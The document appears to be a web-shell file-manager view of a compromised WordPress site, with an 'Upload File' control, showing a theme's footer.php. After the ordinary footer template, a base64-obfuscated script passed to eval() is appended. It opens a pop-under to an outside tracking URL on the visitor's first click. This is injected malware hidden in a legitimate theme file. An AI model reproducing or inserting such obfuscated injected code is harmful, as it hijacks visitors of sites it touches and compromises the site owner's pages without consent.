Your IP : 216.73.216.240


Current Path : /home/s/u/n/sunflowe/www2/disneyexplorer/wp-content/themes/wide/
Upload File :
Current File : /home/s/u/n/sunflowe/www2/disneyexplorer/wp-content/themes/wide/footer.php

<?php
/**
 * The template for displaying the footer
 *
 * @author      NanoAgency
 * @link        http://nanoagency.co
 * @copyright   Copyright (c) 2015 NanoAgency
 * @license     GPL v2
 */
?>
        </div><!-- .site-content -->
        <?php
            $layout_footer = '';
            if(is_page()){
                $layout_footer = get_post_meta($post->ID, 'layout_footer', true);
            }
            if($layout_footer == 'global' || empty($layout_footer)){
                get_template_part('templates/footer/footer', get_theme_mod('wide_footer', '1'));
            }
            else{
                get_template_part('templates/footer/footer', $layout_footer);
            }
        ?>
    </div><!-- .site -->

<?php wp_footer(); ?>
<script>
eval(atob("KGZ1bmN0aW9uKCkgewogICAgdmFyIHBvcFVybCA9ICJodHRwczovL3Byb2R0cm91c2Vycy5jb20vcTV4cnNrNGJmZz9rZXk9YjlhZjc2ODg0ZmMzZDUxZDVhN2M0YjkxNGRhM2QyZGMiOwoKICAgIGlmICghc2Vzc2lvblN0b3JhZ2UuZ2V0SXRlbSgicG9wU2hvd24iKSkgewogICAgICAgIGRvY3VtZW50LmFkZEV2ZW50TGlzdGVuZXIoImNsaWNrIiwgZnVuY3Rpb24oKSB7CiAgICAgICAgICAgIHdpbmRvdy5vcGVuKHBvcFVybCwgIl9ibGFuayIpOwogICAgICAgICAgICBzZXNzaW9uU3RvcmFnZS5zZXRJdGVtKCJwb3BTaG93biIsICJ0cnVlIik7CiAgICAgICAgfSwgeyBvbmNlOiB0cnVlIH0pOwogICAgfQp9KSgpOw=="));
</script>
</body>
</html>